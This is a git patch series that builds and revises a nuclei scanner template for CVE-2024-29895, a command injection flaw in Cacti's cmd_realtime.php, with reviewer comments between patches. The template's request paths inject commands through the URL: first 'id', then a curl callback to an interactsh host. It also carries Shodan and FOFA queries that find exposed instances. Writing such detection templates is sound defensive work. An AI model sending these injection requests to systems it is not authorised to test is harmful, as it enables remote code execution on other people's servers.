From 62ad67b550d9eca9ee5ec2c00421347c25f77089 Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Thu, 16 May 2024 17:15:45 +0530
Subject: [PATCH 1/8] Create CVE-2024-29895.yaml

---
 http/cves/2024/CVE-2024-29895.yaml | 37 ++++++++++++++++++++++++++++++
 1 file changed, 37 insertions(+)
 create mode 100644 http/cves/2024/CVE-2024-29895.yaml

diff --git a/http/cves/2024/CVE-2024-29895.yaml b/http/cves/2024/CVE-2024-29895.yaml
new file mode 100644
index 0000000000..d396055b22
--- /dev/null
+++ b/http/cves/2024/CVE-2024-29895.yaml
@@ -0,0 +1,37 @@
+id: CVE-2024-29895
+
+info:
+ name: Test Injection in Cacti cmd_realtime.php
+ author: pussycat0x
+ severity: critical
+ description: Checks for injection vulnerabilities in cmd_realtime.php on Cacti instances.
+ reference:
+ - https://www.example.com/cve-xxxx-xxxx
+ - https://github.com/Cacti/cacti/blob/501712998589763d411a68d35e3cda98fd9cfd18/cmd_realtime.php#L119
+ - https://github.com/Cacti/cacti/commit/53e8014d1f082034e0646edc6286cde3800c683d
+ - https://github.com/Cacti/cacti/commit/99633903cad0de5ace636249de16f77e57a3c8fc
+ - https://github.com/Cacti/cacti/security/advisories/GHSA-cr28-x256-xf5m
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 10
+ cve-id: CVE-2024-29895
+ cwe-id: CWE-77
+ epss-score: 0.00045
+ epss-percentile: 0.14626
+ tags: cacti,injection
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/cacti/cmd_realtime.php?1+1&&id=1+1+1"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: regex
+ regex:
+ - ""uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
+ part: body

From 249629c0f719aa92e0d709d5b0665c0d64b2aa73 Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Fri, 17 May 2024 10:40:08 +0530
Subject: [PATCH 2/8] Update CVE-2024-29895.yaml

---
 http/cves/2024/CVE-2024-29895.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
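Review bot: The body regex at the end of the hunk, `uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)`, places `(` and `)` inside a character class, where they are literal members rather than a group, so the class is really `[0-9a-z()]` written in a misleading way; spell it out as `- "uid=[0-9a-z()]+ gid=[0-9a-z()]+"` and drop the capture groups, since no extractor uses them. The doubled leading quote on that line is corrected in patch 2 and the placeholder reference `https://www.example.com/cve-xxxx-xxxx` is replaced in patch 5, so neither needs another pass. The same character class is carried unchanged through the second hunk of patch 2 and the third hunk of patch 5 and only disappears when patch 8 switches to interaction matchers, so this note is not repeated there.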
diff --git a/http/cves/2024/CVE-2024-29895.yaml b/http/cves/2024/CVE-2024-29895.yaml
index d396055b22..e1d505c885 100644
--- a/http/cves/2024/CVE-2024-29895.yaml
+++ b/http/cves/2024/CVE-2024-29895.yaml
@@ -1,7 +1,7 @@
 id: CVE-2024-29895

 info:
- name: Test Injection in Cacti cmd_realtime.php
+ name: Cacti cmd_realtime.php - command injection
 author: pussycat0x
 severity: critical
 description: Checks for injection vulnerabilities in cmd_realtime.php on Cacti instances.
@@ -33,5 +33,5 @@ http:

 - type: regex
 regex:
- - ""uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
+ - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
 part: body

From 18b8f552675dc4f7709a12f95d139e7e836d04ec Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Fri, 17 May 2024 10:40:39 +0530
Subject: [PATCH 3/8] Update CVE-2024-29895.yaml

---
 http/cves/2024/CVE-2024-29895.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/http/cves/2024/CVE-2024-29895.yaml b/http/cves/2024/CVE-2024-29895.yaml
index e1d505c885..6908defba7 100644
--- a/http/cves/2024/CVE-2024-29895.yaml
+++ b/http/cves/2024/CVE-2024-29895.yaml
@@ -18,7 +18,7 @@ info:
 cwe-id: CWE-77
 epss-score: 0.00045
 epss-percentile: 0.14626
- tags: cacti,injection
+ tags: cve,cve2024,cacti,rce

 http:
 - method: GET

From 7160a562671b6da7aaf4ff7d38b37367bffb80a2 Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Fri, 17 May 2024 10:43:46 +0530
Subject: [PATCH 4/8] Update CVE-2024-29895.yaml

---
 http/cves/2024/CVE-2024-29895.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/http/cves/2024/CVE-2024-29895.yaml b/http/cves/2024/CVE-2024-29895.yaml
index 6908defba7..b22a709c5a 100644
--- a/http/cves/2024/CVE-2024-29895.yaml
+++ b/http/cves/2024/CVE-2024-29895.yaml
@@ -1,7 +1,7 @@
 id: CVE-2024-29895

 info:
- name: Cacti cmd_realtime.php - command injection
+ name: Cacti cmd_realtime.php - command injection
 author: pussycat0x
 severity: critical
 description: Checks for injection vulnerabilities in cmd_realtime.php on Cacti instances.

From 056bf96bb80315ccd9bf54a4526ddee1fb60c5ff Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Fri, 17 May 2024 13:49:18 +0530
Subject: [PATCH 5/8] minor update

---
 http/cves/2024/CVE-2024-29895.yaml | 26 +++++++++++++++++---------
 1 file changed, 17 insertions(+), 9 deletions(-)

diff --git a/http/cves/2024/CVE-2024-29895.yaml b/http/cves/2024/CVE-2024-29895.yaml
index b22a709c5a..2497c33b26 100644
--- a/http/cves/2024/CVE-2024-29895.yaml
+++ b/http/cves/2024/CVE-2024-29895.yaml
@@ -1,12 +1,13 @@
 id: CVE-2024-29895

 info:
- name: Cacti cmd_realtime.php - command injection
+ name: Cacti cmd_realtime.php - Command Injection
 author: pussycat0x
 severity: critical
- description: Checks for injection vulnerabilities in cmd_realtime.php on Cacti instances.
+ description: |
+ Cacti provides an operational monitoring and fault management framework. A command injection vulnerability on the 1.3.x DEV branch allows any unauthenticated user to execute arbitrary command on the server when `register_argc_argv` option of PHP is `On`. In `cmd_realtime.php` line 119, the `$poller_id` used as part of the command execution is sourced from `$_SERVER['argv']`, which can be controlled by URL when `register_argc_argv` option of PHP is `On`. And this option is `On` by default in many environments such as the main PHP Docker image for PHP.
 reference:
- - https://www.example.com/cve-xxxx-xxxx
+ - https://github.com/Stuub/CVE-2024-29895-CactiRCE-PoC
 - https://github.com/Cacti/cacti/blob/501712998589763d411a68d35e3cda98fd9cfd18/cmd_realtime.php#L119
 - https://github.com/Cacti/cacti/commit/53e8014d1f082034e0646edc6286cde3800c683d
 - https://github.com/Cacti/cacti/commit/99633903cad0de5ace636249de16f77e57a3c8fc
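Review bot: The new `description` in the first hunk of patch 5 is a single line of several hundred characters under a `|` block scalar, which makes this hunk and every future diff of the file hard to read; because `|` preserves line breaks, splitting it into one sentence per line only adds newlines to the rendered text. Two wording nits while the line is being touched: `execute arbitrary command` should read `execute arbitrary commands`, and `the main PHP Docker image for PHP` can be `the official PHP Docker image`. The precondition given here, `register_argc_argv` set to `On` on the 1.3.x DEV branch, is exactly what a triager needs to decide whether a release install is in scope, so it is worth stating once, up front, rather than twice mid-paragraph.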
@@ -17,7 +18,14 @@ info:
 cve-id: CVE-2024-29895
 cwe-id: CWE-77
 epss-score: 0.00045
- epss-percentile: 0.14626
+ epss-percentile: 0.14706
+ metadata:
+ verified: true
+ max-request: 1
+ vendor: cacti
+ product: cacti
+ shodan-query: http.favicon.hash:-1797138069
+ fofa-query: icon_hash="-1797138069"
 tags: cve,cve2024,cacti,rce

 http:
@@ -27,11 +35,11 @@ http:

 matchers-condition: and
 matchers:
+ - type: regex
+ part: body
+ regex:
+ - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
+
 - type: status
 status:
 - 200
-
- - type: regex
- regex:
- - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
- part: body

From 1f20bbb640aa47342935e11cb3f9d456350d73cd Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Fri, 17 May 2024 14:24:28 +0530
Subject: [PATCH 6/8] trailspace fix

---
 http/cves/2024/CVE-2024-29895.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/http/cves/2024/CVE-2024-29895.yaml b/http/cves/2024/CVE-2024-29895.yaml
index 2497c33b26..d822ac3f4b 100644
--- a/http/cves/2024/CVE-2024-29895.yaml
+++ b/http/cves/2024/CVE-2024-29895.yaml
@@ -5,7 +5,7 @@ info:
 author: pussycat0x
 severity: critical
 description: |
- Cacti provides an operational monitoring and fault management framework. A command injection vulnerability on the 1.3.x DEV branch allows any unauthenticated user to execute arbitrary command on the server when `register_argc_argv` option of PHP is `On`. In `cmd_realtime.php` line 119, the `$poller_id` used as part of the command execution is sourced from `$_SERVER['argv']`, which can be controlled by URL when `register_argc_argv` option of PHP is `On`. And this option is `On` by default in many environments such as the main PHP Docker image for PHP.
+ Cacti provides an operational monitoring and fault management framework. A command injection vulnerability on the 1.3.x DEV branch allows any unauthenticated user to execute arbitrary command on the server when `register_argc_argv` option of PHP is `On`. In `cmd_realtime.php` line 119, the `$poller_id` used as part of the command execution is sourced from `$_SERVER['argv']`, which can be controlled by URL when `register_argc_argv` option of PHP is `On`. And this option is `On` by default in many environments such as the main PHP Docker image for PHP.
 reference:
 - https://github.com/Stuub/CVE-2024-29895-CactiRCE-PoC
 - https://github.com/Cacti/cacti/blob/501712998589763d411a68d35e3cda98fd9cfd18/cmd_realtime.php#L119

From ea8e3cd0c5effbd0fe3a314ea12265e10938d0d0 Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Wed, 5 Jun 2024 14:24:23 +0530
Subject: [PATCH 7/8] Update CVE-2024-29895.yaml

---
 http/cves/2024/CVE-2024-29895.yaml | 1 -
 1 file changed, 1 deletion(-)

diff --git a/http/cves/2024/CVE-2024-29895.yaml b/http/cves/2024/CVE-2024-29895.yaml
index d822ac3f4b..cea5a8cd54 100644
--- a/http/cves/2024/CVE-2024-29895.yaml
+++ b/http/cves/2024/CVE-2024-29895.yaml
@@ -20,7 +20,6 @@ info:
 epss-score: 0.00045
 epss-percentile: 0.14706
 metadata:
- verified: true
 max-request: 1
 vendor: cacti
 product: cacti
From 60370f59f83e106670ae9db21b37a4c2a10ad0a6 Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Thu, 13 Jun 2024 22:27:56 +0530
Subject: [PATCH 8/8] Update CVE-2024-29895.yaml

---
 http/cves/2024/CVE-2024-29895.yaml | 15 ++++++++++-----
 1 file changed, 10 insertions(+), 5 deletions(-)

diff --git a/http/cves/2024/CVE-2024-29895.yaml b/http/cves/2024/CVE-2024-29895.yaml
index cea5a8cd54..0a3c4f53fe 100644
--- a/http/cves/2024/CVE-2024-29895.yaml
+++ b/http/cves/2024/CVE-2024-29895.yaml
@@ -30,14 +30,19 @@ info:
 http:
 - method: GET
 path:
- - "{{BaseURL}}/cacti/cmd_realtime.php?1+1&&id=1+1+1"
+ - "{{BaseURL}}/cacti/cmd_realtime.php?1+1&&curl%20{{interactsh-url}}+1+1+1"

 matchers-condition: and
 matchers:
- - type: regex
- part: body
- regex:
- - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
+ - type: word
+ part: interactsh_protocol
+ words:
+ - "http"
+
+ - type: word
+ part: interactsh_request
+ words:
+ - "User-Agent: curl"

 - type: status
 status:
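Review bot: Detection now rests on the two interaction matchers (`interactsh_protocol`, `interactsh_request`), but the `tags` line earlier in the file, outside this hunk, still reads `cve,cve2024,cacti,rce`; nuclei-templates conventionally tag interaction-based templates with `oast` so that runs without an interactsh server can exclude or recognise them, `tags: cve,cve2024,cacti,rce,oast`. With `matchers-condition: and` kept, the `status: 200` matcher at the bottom of the hunk must also match, so a host that made the callback but answered with any other status is reported clean; the page does not show what `cmd_realtime.php` returns in that case, so either confirm it or let the interaction evidence stand on its own. The `description` (also outside the hunk) should say that a result depends on the target being able to reach the interactsh host, so that no hit on an egress-filtered instance is read as a possible false negative rather than as proof the instance is patched.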